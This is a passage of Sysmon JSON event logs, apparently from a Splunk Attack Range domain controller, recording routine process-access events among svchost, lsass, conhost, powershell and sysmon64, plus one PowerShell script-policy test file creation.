C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.818","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8514,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.818\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.818","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8515,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.818\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.818","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8516,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.818\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.818","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8517,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.818\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-00109DB21100}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.818","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-00109DB21100}","TargetProcessId":"4976","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8518,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.818\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-0010DDB01100}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.818","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-0010DDB01100}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8519,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.834\r\nProcessGuid: {41C8662E-22D1-5F25-0000-0010DDB01100}\r\nProcessId: 5016\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tr4d2wqd.3rt.ps1\r\nCreationUtcTime: 2020-08-01 08:07:45.834","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.834","ProcessGuid":"{41C8662E-22D1-5F25-0000-0010DDB01100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tr4d2wqd.3rt.ps1","CreationUtcTime":"2020-08-01 08:07:45.834","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8520,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.881\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-0010DDB01100}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.881","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-0010DDB01100}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8521,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.881\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-0010DDB01100}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.881","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-0010DDB01100}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
